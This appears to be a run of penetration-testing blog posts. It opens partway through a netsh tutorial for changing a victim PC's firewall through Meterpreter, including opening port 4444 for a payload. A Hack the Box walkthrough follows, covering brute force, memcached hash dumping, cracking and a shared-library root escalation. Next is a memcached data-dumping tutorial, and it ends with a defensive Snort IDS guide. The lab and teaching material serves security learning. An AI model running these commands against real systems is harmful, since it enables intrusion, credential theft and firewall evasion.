Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:

And if you check its properties and click on 'Protocols and Ports' tab then you will find that now it has blocked both port 80 and port 443:

Now, by blocking ports 80 and 443 we have blocked the HTTPand HTTPS services on the remote PC and so our victim will not be able to access any website. And the following error is displayed :

How to view Firewall Rules

Now we will learn how to view inbound and outbound rules of the firewall in remote PC, how to delete a rule, how to allow the port on which our payload will work in future, how to stop your remote PC from being ping.

First of all let us assume that there is a blocked port in an outbound rule in our remote PC:

To know which rule is enabled and disabled in our remote PC, take a session through meterepreter and bypass administrator privileges. After doing so type:

 netsh advfirewall firewall show rule=all

Once this command is executed, all the rules will be displayed :

In the above image, we can see that Port 80 and Port 443 is blocked under the rule name “Block All Ports”.  So to delete that rule in the remote PC  type :

Netsh  advfirewall firewall delete rule name=”Block All Ports” 

Once this command executed, the said rule will be deleted. And you can run
netsh advfirewall firewall show rule=all
Command again to see the result :

And we can also see the result in the firewall outbound rules :

Our normal payload works on port 4444. Now, if we want to allow port 4444 so we can upload a payload which works on port 4444, we just have to type :

netsh advfireweall firewall add rule name=”Allow Port 4444” protocol=TCP dir=out remoteport=4444 action=allow

Once this command executed, port 4444 will be allowed on our remote PC :



Now to block stop our remote PC from being pinged we can just type :
netsh advfirewall firewall add rule name=”All ICMPV4” dir=in action=block protocol=icmpv4

When this command will be executed, a rule blocking ping to our remote PC will be created:



And the following will be the result :

View Current Profile Status

Now we will see how to block /allow particular IP Address in remote PC Firewall and also learn how to view details of programs added to the exception/allowed list and the details of port added to the exception/allowed list. Along with this, we will learn how to see the status of the main settings of Firewall and what its current profile, i.e is whether it is on or off.

netsh advfirewall show currentprofiles

After knowing the profile of the firewall we can see which programs are allowed by the host of Remote PC. For this, type:

netsh firewall show allowedprogram

Our next command is to see the status of the main settings. And to see them, type:
netsh firewall show config

Next, we can also see the location of the file in which all the firewall logs are kept. And for this, type:
netsh firewall show logging

The firewall also allows us to Block a single IP address while allowing others and vice versa. So first to let us learn how we can Block a single IP For this, type:

netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=192.168.0.15/32

(In the above command "/32" is a subnet mask of IP.)

After executing the said command, we can see the following result:



And we now see the properties of the IPBlock rule we can see that the IP: 192.168.0.15 is blocked



Now, similarly, to allow a particular IP Address, type:
netsh advfirewall firewall add rule name="Allow IP" dir=in interface=any action=allow remoteip=192.168.0.15/32
(In the above command "/32" is a subnet mask of IP)

After executing the said command, you can see the following result:



And we now see the properties of the IPBlock rule we can see that the IP: 192.168.0.15 is Allowed :

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the Box: Dab Walkthrough

February 20, 2019, 2:49 am

≫ Next: Penetration Testing on Memcached Server

≪ Previous: Firewall Penetration Testing in Remote Windows PC (netsh Tutorial)

$

0

0

Today we are going to solve another CTF challenge “Dab”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Dab is 10.10.10.86

Penetrating Methodology

·        Network scanning (Nmap)

·        Logging in FTP using Anonymous Login

·        Find Hidden file using steghide

·        Bruteforce Login Credential using Burpsuite

·        Manage Cookies using Burpsuite to get access

·        Bruteforce all ports using wfuzz

·        Retrive version and password hashes on memchached server

·        Crack password hash using John the Ripper

·        Bruteforce the credentials using Hydra

·        Logging into server using SSH and getting user flag

·        Using ltrace to extract application password

·        Compile the remaining function using gcc

·        Snagging the Root Flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV -sC 10.10.10.86

The nmap scan shows us that there are 4 ports open: 21(FTP), 22(SSH), 80(HTTP), 8080(HTTP)

As port 21 is open, we access it using FTP and find a JPG file. We download it to our system to find more information about the image file.

We use a tool called “steghide” to find if there is any file hidden inside the image and find a hidden text file called “dab.txt”. We extract the file and open it and find that it was a dead end.

steghide --info dab.jpg

steghide extract -sf dab.jpg -xf dab.txt

Now as port 80 is running HTTP, we access the web service and find a login page.

Port 8080 is also running HTTP, we try to access the web service and get an error that the authentication cookie is not set.

We try to brute force the username and password, so we capture the request of the browser using burpsuite and send it to intruder and selected attack type “Cluster bomb” and select the parameter username and password as target.

After selecting “rockyou.txt” as our wordlist we start the brute force and find the correct username and password to be “admin:Password1”.

We are still not able to access the web application on port 8080, as it still shows the same cookie error. So we bruteforce the cookie parameter using burpsuite.

After selecting “rockyou.txt” as wordlist, we find the cookie parameter is called “password”. We also get another error; stating that the password authentication cookie is incorrect.

So we again capture the request, and this time we brute force the value of password parameter.

After selecting “rockyou.txt” as our wordlist, we brute force the “password” variable and find the value to be “secret”.

Using burpsuite we change the cookie and are now able to access the web page. After accessing it we find a web application that can be used to send command to a certain port.

Using burpsuite we change the cookie and are now able to access the web page. After accessing it we find a web application that can be used to send command to a certain port.

Using burpsuite we change the cookie and are now able to access the web page. After accessing it we find a web application that can be used to send command to a certain port.

We use wfuzz tool to brute force all the ports that can only be accessed internally and find port 11211 is open.

wfuzz -c -z range,1-65535 -u ‘http://10.10.10.86:8080/socket?port=FUZZ&cmd=hack’ –H “Cookie: password=secret” --hc=500

Now port 11211 is for memcached server, so we run version command to check the version of the memcached server.

We find that we are successfully able to get the version of the memcached server.

Now after getting the version of the memcached server we try to find all the users that are available on the web server. So we send the command “get users” to port 11211.

After running the command, we are successfully able to get username and password hashes available on the memcached server.

We copy the username and password from the web site into a text file so that we can user john the ripper to crack the hashes.

john --format=raw-md5 --show user2.txt > cracked.txt

After cracking the password, we use the saved file to bruteforce SSH login using hydra and find the correct credentials to be “genevieve:Princess1”.

hydra -C cracked.txt ssh://10.10.10.86 -t4

Now we use this credential to login through SSH. After logging in we find a file called “user.txt”, when we open it we find our first flag.

We now find the file with suid bit set, and find an application called “myexec”.

find / -perm -4000 2>/dev/null

We run the application and find that it is asking for a password.

We now use ltrace to find the password of the application.

ltrace myexec

Now when we give the correct password and run it with ltrace. We find that a function is missing from the application.

We find the shared library that the application is using. We check “/etc/ld.so.conf.d/test.conf” to find the location from which the preloaded library is accepted and find it is “/tmp” directory.

ldd /usr/bin/myexec

cat /etc/ld.so.conf.d/test.conf

Now create a C program to execute “/bin/bash” inside /tmp directory.

We compile it as a shared library.

gcc –Wall –fPIC –shared –o libseclogin.so /tmp/libseclogin.c

Now we copy it inside the /tmp/ directory and cache the shared library using “ldconfig”. Then when run the application and give it the correct password we are able to spawn a bash shell as root user. We move to /root directory and find a file called “root.txt”. We take a look at the content of the file and find the final flag.

cp libseclogin.so /tmp/

ldconfig

myexec

Penetration Testing on Memcached Server

February 22, 2019, 6:42 am

≫ Next: Comprehensive Guide on Snort

≪ Previous: Hack the Box: Dab Walkthrough

$

0

0

In our previous article we learned how to configure Memcached Server in Ubuntu 18.04 system to design our own pentest lab. Today we will learn multiple ways to exploit Memcached Server.

Table of Contents

·         Dumping data from the Memcached server manually.

·         Dumping data using libmemcached-tools.

·         Dumping data using Metasploit.

·         Monitoring using Watchers.

Requirements

Target: Memcached Server running in ubuntu 18.04 system

Attacker: Kali Linux

Let’s Begin!!

Dumping data from Memcached server manually

Boot up your kali machine and do a simple nmap scan first to check whether the target machine is running Memcached Server or not.

nmap  -sV  -p- 192.168.1.32

As you can see in the above image, memcached is running in the target machine and the port 11211 is open.

Now, let’s do a little advanced search using nmap script command by typing the following command.

nmap  -p11211  --script=memcached-info 192.168.1.32

As you can see in the above image, nmap script command fetched us some crucial information about the memcached server such as process ID, Uptime, Architecture, MAC Address etc.

Now, let’s try to connect the memcached server using telnet by typing in the commands given below.

telnet 192.168.1.32 11211

As you can see in the above image, we are able to connect the Memcached Server through telnet. In such cases, the server is unprotected, hence, an attacker can gain access to the server without any obstacle because the server is not configured with SASL or any kind of firewall. Let’s go ahead and begin exploitation of the Memcached Server of which we gained access previously.

Type in a command version to do a version scan of the Memcached Server.

version

 

The above data represents that the version of Memcached is 1.5.6 and it is running in a Ubuntu machine.

Now, let’s get straight to fetch the valuable data stored in the server. Type the command shown below to print all the general statistics of the server.

stats

The above information shows the current traffic statistics. It serves the number of connections, data being stored into the cache, cache hit ratios and detailed information on the memory usage and distribution of information through the slab allocation used to store individual items.

Now, we will run another command to fetch the slab statistics. Slabs are created and allocated for storing information within cache. Run the command shown below.

stats slabs

As you can observe in the above image, currently there is only one slab present in the server whose slab number is 1.

Now, let’s run a command mentioned below to fetch count, age, eviction, expired etc. organized by slab ID.

stats items

The above image gives us an insight of how the data is organized in slab ID 1.

Now, let’s run the command below to dump all the keys present in a particular slab.

stats cachedump 1 0

Here 1 and 0 are the parameters,

1 = slab ID.

0 = It represents the number of keys you want to dump, 0 will dump all the keys present in the slab ID respectively.

The above image represents ITEM [ b; s]

Now, we can simply use the get command to fetch the values stored in the keys as shown below.

get first

get second

get third

As you can see in the above image, we have successfully dumped the data stored in the key values.

Dumping data using libmemcached-tools

Dumping of data using this toolkit makes the work a lot easier. So, let’s start by installing libmemcached-tools in our system by typing in the following command.

apt install libmemcached-tools

Now that we have installed libmemcached-tools let’s start using it by typing in the following command.

memcstat  --servers=192.168.1.33

The above command will give pretty much the same result as the stats command which we had used earlier while fetching the server statistics manually.

Now, let’s get straight to dumping the key values stored in the server. Run the command given below.

memcdump  --servers=192.168.1.33

As you can see in the above image, we have dumped all the keys present in the server currently.

Now, let’s dump all the values stored in the keys respectively. Run the command shown below.

memccat  --servers=192.168.1.33 fifth fourth third second first

The above command fetched us all the data stored in the respective key values. An attacker can use libmemcached-tools to easily upload any malicious file to the server too. Here, we will be showing an example of how to upload a file in the server.

Type the command shown below.

memccp  --servers=192.168.1.33 file

Here, the memccp command is uploading a file named “file.txt” present in the root directory of our system.Now, let’s use memcat to view the content of file which we have uploaded in the server.

memcat  --servers=192.168.1.33 file

 

As you can see, the above command fetched us the content of the file.

Dumping data using Metasploit

As we all know, no exploitation is complete without using the Metasploit Framework once. So let’s dig in and see how we can exploit Memcached using Metasploit.

Fire up the Metasploit Framework and search memcached.

search memcached

 

The above image shows that there are currently 4 auxiliaries present in Metasploit.

We will be using auxiliary/gather/memcached_extractor to fetch the keys and the values stored in it. Run the command given below.

use auxiliary/gather/memcached_extractor

Once you have successfully imported the auxiliary in the Metasploit Framework, just set the rhost and then run the auxiliary. We know that Memcached stores data temporarily. So the above image shows that the auxiliary had fetched us both the Key and the Value currently present in the Memcached Server and stored it in its default location /root/.msf4/loot/20190218044841_default_192.168.1.35_memcached.dump_286171.txt

Monitoring using Watchers

Watchers are a way to connect to Memcached and monitor all the actions being performed internally.

Now connect the Memcached using telnet and type the command shown below.

watch fetchers

The command line OK indicates that watcher is ready to send logs.

As you can see in the above image, all the actions which are being performed in the server are shown here live.

Conclusion

In this articles we have learned the beginner level methods to exploit Memcached. In our future articles we will be showing advanced methods to exploit the Memcached Servers.

Stay tuned!!

Comprehensive Guide on Snort

February 22, 2019, 9:54 pm

≫ Next: Hack the Box: Giddy Walkthrough

≪ Previous: Penetration Testing on Memcached Server

$

0

0

This article will introduce a guide to understand IDS using Snort as an example for it.

Table of Content :

·        Introduction to IDS

·        Categories of IDS

·        Types of IDS

·        Introduction to Snort

Introduction to IDS

IDS Stands for Intrusion Detection System. The techniques and methods on which an IDS is founded on are used to monitor and reveal malicious activities both on host and network level. Once the said activities occur then an alert is issued to aware every one of the attack. It can be hardware or software or a combination of both; depends on the requirement. An IDS use both signature or anomaly based technique together or separately; again depending on requirement. Your network topology determines on where to add intrusion detection systems. Whether it should be positioned at one or more places depends on if you want to track internal threat or external threat. For instance, if you want to protect yourself from external traffic then you should place an IDS at router and if you want to protect inner network then place the IDS on every network segment.

Categories of IDS

Signature-Based IDS

This IDS verifies signatures of data packets in the network traffic. Basically, it finds the data packets and uses their signatures to confirm whether they are a threat or not. Such signatures are commonly known for intrusion related signatures or anomalies related to internet protocol. Intruders such as computer viruses, etc, always have a signature therefore it can be easily detected by software IDS. As its uses signatures to identify the threats.

Anomaly IDS

This IDS usually detects if a data packet behaves anomaly. It issues an alert if a packet anomalies are present in protocol header parts. This system produces better results in some cases than signature based IDS. Normally such IDS captures data from the network and on these packets, it then applies the rules to it in order to detect anomalies.

Types of IDS

NIDS

NIDS stand for Network Intrusion Detection System. These types of IDS will capture data packets that being received and sent in the network and tally such packets from the database of signatures. if the packet is match then no alert will be issued otherwise it will issue an alert letting everyone know of a malicious attack. Snort is an excellent example of a NIDS.

HIDS

HIDS stands for Host Intrusion Detection System which, obviously, acts as an host. Such types of IDS monitors system and application logs to detect intruder activity. Some IDS reacts when some malicious activity takes place, others monitor all the traffics coming to the host where IDS is installed and give alerts in real time.

Introduction to snort

Snort is a Network Intrusion Detection System (NIDS). It’s quite popular and is open source software which helps in monitor network traffic in real-time, hence it can also be considered as packet sniffer. Basically, it examines each and every data packet in depth to see if there is any malicious payloads. it can also be used for protocol analysis and content searching. It is capable of detecting various attacks like port scans, buffer overflow, etc. It's available for all platforms i.e. windows, linux, etc. It doesn’t require any recompilation with the system or a hardware to added to your distribution; root privileges are required though. It inspects all the network traffic against the provided set of rules and then alerts the administration about any suspicious activity. it's divided into multiple components and all the components works together to detect an intrusion. Following are the major components of snort :

·        Packet Decoder

·        Pre-processors

·        Detection Engine

·        Logging and Alerting System

·        Output Modules

Installation of Snort

First, use ifconfig command in your ubuntu to check the interface. As you can see the image below the interface is ens33.

Now, lets install snort by using following command :

sudo apt-get install snort*

Once the installation starts, it will ask you the interface that we previously checked. Give it’s name here and press enter.

Then it will ask you about your network IP. Here, you can either provide a single IP or the range of IPs as we have given below in the image :

Then possible, it will again ask you for the name of interface, provide it again and press enter.

As the snort is installed, open the configuration file using nano or any text editor to make some changes inside. Use the following command to do so :

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in the given image.

#Setup the network addresses you are protecting

ipvar HOME_NET 192.168.1.21

Now run given below command to enable IDS mode of snort :

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

The above command will compile the complete file and test the configuration setting automatically as shown in given below image:

Once the snort is installed and configured, we can start making changes to its rules as per our own requirement and desire. To the rules on which snort works use the following command :

cd etc/snort/rules

ls -la

As shown in the image below, you can find all the documents related to rules.

Snort rule format

Snort offers its user to write their own rule for generating logs of Incoming/Outgoing network packets. Only they need to follow the snort rule format where packets must meet the threshold conditions. Always bear in mind that the snort rule can be written by combining two main parts “the Header” and “the Options” segment.

The header part contains information such as the action, protocol, the source IP and port, the network packet Direction operator towards the destination IP and port, the remaining will be considered in the options part.

Syntax: Action Protocol Source IP Source port -> Destination IP Destination port (options)

Header Fields:-

Action: It informs Snort what kind of action to be performed when it discovers a packet that matches the rule description. There are five existing default job actions in Snort: alert, log, pass, activate, and dynamic are keyword use to define the action of rules. You can also go with additional options which include drop, reject, and sdrop.

Protocol: After deciding the option for action in the rule, you need to describe specific Protocol (IP, TCP, UDP, ICMP, any) on which this rule will be applicable.  

Source IP: This part of header describes the sender network interface from which traffic is coming.

Source Port: This part of header describes the source Port from which traffic is coming.

Direction operator (“->”, “<>”): It denotes the direction of traffic flow between sender and receiver networks.

Destination IP: This part of header describes the destination network interface in which traffic is coming for establishing the connection.

Destination Port: This part of header describes the destination Port on which traffic is coming for establishing the connection.

Option Fields:

The body for rule option is usually written between circular brackets “()” that contains keywords with their argument and separated by semicolon “;” from another keyword.

There are four major categories of rule options.

General: These options contains metadata that offers information with reference to them.

Payload: These options all come across for data contained by the packet payload and can be interconnected.

Non-payload: These options come across for non-payload data.

Post-detection: These options are rule specific triggers that happen after a rule has fired.”

General Rule Options (Metadata)

In this article are going to explore more about general rule option for beginners so that they can easily write a basic rule in snort rule file and able to analyst packet of their network. Metadata is part of the optional rule which basically contains additional information of about snort rule that is written with the help of some keywords and with their argument details.

Keyword	Description
msg	The msg keyword stands for “Message” that informs to snort that written argument should be print in logs while analyst of any packet.
reference	The reference keyword allows rules to a reference to information present on other systems available on the Internet such as CVE.
gid	The gid keyword stands for “Generator ID “which is used to identify which part of Snort create the event when a specific rule will be launched.
sid	The sid keyword stands for “Snort ID” is used to uniquely identify Snort rules.
rev	The rev keyword stands for “Revision” is used to uniquely identify revisions of Snort rules.
classtype	The classtype keyword is used to assigned classifications and priority numbers to the group and distinguish them a rule as detecting an attack that is part of a more general type of attack class. Syntax: config classification: name, description, priority number.
priority	The priority keyword to assigns a severity rank to your rules.

Let’s start writing snort rule:

To check whether the Snort is logging any alerts as proposed, add a detection rule alert on IP packets in the “local.rules file”

Before writing new rules let’s empty the ICMP rule file by using following command :

echo “” > icmp.rules

cat imcp.rules

The cat command will confirm you whether the file is empty. Now, let’s empty the icmp-info.rules :

echo “” > icmp-info.rules

cat imcp-info.rules

Now let’s write the rule :

alert icmp any any -> 192.168.1.21 any (msg: “ICMP Packet found”; sid:10000001; )

If you observe in the image below, we have used one way arrow which means that snort will alert us about incoming malicious traffic :

The IP (192.168.1.10) we will attack from is shown in the image shown below :

Now, we will send two packets with the following command :

ping -n 2 192.168.1.21

You can check the details of the packets that are being sent :

Use the following command to activate snort in order to catch the malicious packets :

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i ens33

Here,

-A Set alert mode: fast, full, console, test or none

-q stands for Quiet, Don’t show banner and status report.

–u Run snort uid as user

-g Run snort gid as group (or gid)

-c Use Rules File

-i listen on interface

And as you can see in the image below the alerts are being issued by snort :

Now, add the following rule to see both incoming and outgoing traffic when an alert is issued :

alert icmp any any <> 192.168.1.21 any (msg: “ICMP Packet found”; sid:10000001; )

As the below image shows in this we have used ‘<>’, it is used in order to monitor both sent and received packets when an alert is issued.

Again we will send two packets like before using the following command :

ping -n 192.168.1.21

And therefore, as a result, you can see both packets as shown in the image below :

Now we will apply rules on port 21, 22 and 80. This way, whenever a suspicious packet is sent to these ports, we will be notified. Following are the rules to apply to achieve the said :

alert tcp any any -> any 21 (msg: “FTP Packet found”; sid:10000002; )

alert tcp any any -> any 22 (msg: “SSH Packet found”; sid:10000003; )

alert tcp any any -> any 80 (msg: “HTTP Packet found”; sid:10000003; )

When the packet is sent to port 80 as shown in the image :

Snort will issue an alert of HTTP packet as its shown in the image below :

Similarly, when a data packet sent to ftp as given in the following image :

The FTP packets will be detected and one will be notified.

Again, in the similar manner, when one tries to send packets to SSH as shown in the image below :

Snort will notify the administration as shown below :

This way, using snort or any other IDS one can be protected from network attacks by being notified of the in time.